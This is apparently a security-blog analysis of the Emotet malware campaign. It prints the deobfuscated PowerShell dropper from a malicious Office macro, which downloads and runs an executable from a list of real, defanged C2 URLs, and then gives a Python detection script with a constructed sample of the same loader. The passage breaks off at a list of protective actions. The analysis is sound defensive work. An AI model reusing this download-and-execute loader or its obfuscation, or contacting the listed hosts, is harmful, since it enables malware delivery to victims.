Emotet is a multipurpose malware family that is mainly distributed through spam e-mails. It was first spotted in 2014 and was originally designed to steal bank account details. Since then, many different versions have appeared, adding functionality such as sending malspam or delivering other malware families such as TrickBot or Ryuk.
Emotet has been back since early September, infecting devices through botnet-driven campaigns that send out large quantities of e-mails. Emotet targets everyone, although lately much of the activity has been directed at countries such as Spain, Germany, Italy and England.
The infection usually starts with a Microsoft Office document whose macro tries to download Emotet from compromised WordPress sites that act as command-and-control (C2) servers.
In the following code block you can see the deobfuscated PowerShell payload launched by the macro:
```powershell
$HVS084rA='------'; # obfuscated on purpose
$Yt3Nqui = '768'; # malware file will be named 768.exe
$zHmAqiz='------'; # obfuscated on purpose
$FXYOYOI=$env:userprofile+''+$Yt3Nqui+'.exe';
$PIbfiXEH='bHtA6OA';
$GpQtLHc=.('new-ob'+'je'+'ct') NeT.WebcLIent;
# Command and controls
$t4Nj2JHD='https[:]//autorepuestosdml.com/wp-content/CiloXIptI/@https[:]//pep-egypt.com/eedy/xx3yspke7_l7jp5-430067348/@http[:]//danangluxury.com/wp-content/uploads/KTgQsblu/@http[:]//www.gcesab.com/wp-includes/customize/zUfJervuM/@https[:]//bondagetrip.com/wp-content/y0gm3xxs_hmnw8rq-764161699/'."SP`LIT"('@');
$bVnfHzcp='IEqNJ6';
foreach($Ej9owjPj in $t4Nj2JHD){
try{
# downloads file from C2 and saves it as the previously defined name
$GpQtLHc."D`O`WNlOAdf`IlE"($Ej9owjPj, $FXYOYOI);
$zcvi4r='zfVXqT';
If ((.('Ge'+'t'+'-Item') $FXYOYOI)."LEn`G`Th" -ge 34897){
# Starts a process with the downloaded file
[Diagnostics.Process]::"st`ART"($FXYOYOI);
$hqnUrFtL='Q25kFRKB';
break;
$wc7Zz3='aa2UOX'}
}
catch{}
}
$AuSWBW='obD7PFjS'
```
All the macros we've seen lately in Spain share the very same structure, although in the latest payloads we noticed that the string delimiter switched from @ to *. Note that the payload is base64-encoded and is passed to PowerShell through the -EncodedCommand parameter.
From the previous code block, we can see that the PowerShell process will try to download files from the C2 servers defined in the variable $t4Nj2JHD and start a process with the downloaded file, which is usually an executable.
To avoid detection based on the process chain, Emotet's download can also be performed through the Windows Management Instrumentation Provider Host (WmiPrvSe.exe), which executes the same encoded PowerShell command.
The downloaded malicious executables are usually located at the root of the user folder with three-digit names, like 768.exe in the previous code block. Further dropped malware can also be found in the System32 and SysWOW64 folders, or TrickBot and other generic malware in a newly generated folder under AppData.
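The three observations above (the base64 -EncodedCommand payload with its @- or *-delimited URL list, the WmiPrvSe.exe launch path, and the three-digit .exe dropped under the user profile) can be turned into a triage routine for process-creation events. The following is an added example written for this article, not code from the original post or from any vendor tool. It assumes an EDR or Sysmon-style record that gives the parent image name and the full command line; the parent list, the scoring thresholds and the sample script are assumptions, and the sample URLs are RFC 2606 example domains rather than the C2 addresses from the post.

```python
"""Triage of the PowerShell dropper pattern described above.

Added example, not code from the original post. It assumes a process-creation
record that carries the parent image name and the full command line, such as
an EDR or Sysmon event. Every sample value below is constructed; the URLs are
RFC 2606 example domains, not the C2 addresses from the post.
"""
import base64
import re
from typing import Optional

# Office hosts and the WMI provider host are the launch paths the post describes (assumed list).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "wmiprvse.exe"}

# "-e", "-ec", "-enc", "-encoded" and "-encodedcommand" are all accepted by PowerShell.
_ENC_RE = re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\b\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
_CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
_URL_RE = re.compile(r"https?://[^\s'\"@*]+", re.IGNORECASE)
_SIZE_RE = re.compile(r"\.[\"']?length[\"']?\s+-ge\s+(\d+)", re.IGNORECASE)
_EXEC_RE = re.compile(r"diagnostics\.process\]::[\"']?start", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand (base64 of UTF-16LE text), or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")


def deobfuscate(script: str) -> str:
    """Undo the two cosmetic tricks used in the macro shown above.

    Backticks inside method names ("D`O`WNlOAdf`IlE") are PowerShell escapes
    that are no-ops for ordinary letters, so dropping them restores the real
    name; 'a'+'b' concatenations are folded into one literal. Heuristic only:
    a genuine escape such as `n would also lose its backtick.
    """
    script = script.replace("`", "")
    while True:
        folded = _CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        if folded == script:
            return script
        script = folded


def extract_indicators(script: str) -> dict:
    """Pull out the URL list, the size check and the behavioural markers."""
    clean = deobfuscate(script)
    low = clean.lower()
    size = _SIZE_RE.search(clean)
    return {
        # URLs are separated by '@' in older payloads and '*' in newer ones;
        # excluding both characters from the URL body splits either form.
        "urls": _URL_RE.findall(clean),
        "min_size": int(size.group(1)) if size else None,
        "downloads": "net.webclient" in low and "downloadfile" in low,
        "executes": _EXEC_RE.search(clean) is not None,
        "drops_in_userprofile": "$env:userprofile" in low and ".exe" in low,
    }


def triage_event(parent_image: str, cmdline: str) -> dict:
    """Score one process-creation event without relying on a known C2 list."""
    result = {"parent_suspicious": parent_image.lower() in SUSPICIOUS_PARENTS,
              "encoded": False, "indicators": None, "verdict": "clean"}
    script = decode_encoded_command(cmdline)
    if script is None:
        return result
    ind = extract_indicators(script)
    hits = sum([ind["downloads"], ind["executes"], ind["drops_in_userprofile"],
                len(ind["urls"]) > 1, result["parent_suspicious"]])
    # An encoded command alone is worth a look; three or more markers look like the dropper.
    result.update(encoded=True, indicators=ind,
                  verdict="likely-dropper" if hits >= 3 else "suspicious")
    return result


# Constructed test vector mirroring the structure of the macro above (placeholder URLs only).
SAMPLE_SCRIPT = (
    "$n='123';$f=$env:userprofile+'\\'+$n+'.exe';"
    "$w=.('new-ob'+'je'+'ct') NeT.WebcLIent;"
    "$u='http://www.example.com/wp-content/a/*https://example.net/b/*"
    "http://example.org/c/'.\"SP`LIT\"('*');"
    "foreach($x in $u){try{$w.\"D`O`WNlOAdf`IlE\"($x,$f);"
    "If((.('Ge'+'t'+'-Item') $f).\"LEn`G`Th\" -ge 34897)"
    "{[Diagnostics.Process]::\"st`ART\"($f);break}}catch{}}"
)
SAMPLE_CMDLINE = "powershell.exe -WindowStyle Hidden -EncodedCommand " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode()

if __name__ == "__main__":
    import json
    print(json.dumps(triage_event("WmiPrvSe.exe", SAMPLE_CMDLINE), indent=2))
```

The verdict is deliberately independent of the C2 list, because the post notes that the payload is updated from time to time and the hosting sites change; the URL extraction is there to feed blocklists and hunting, not to decide the verdict. Running the block as a script prints the triage result for the constructed sample launched from WmiPrvSe.exe.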
The Emotet campaign that is currently active has impacted many organizations and individuals, and once a device is infected, Emotet spreads to other devices. This campaign is supported by at least two different groups, and the payload is actively updated from time to time.
In order to protect your infrastructure against these attacks, you should take into consideration the following actions: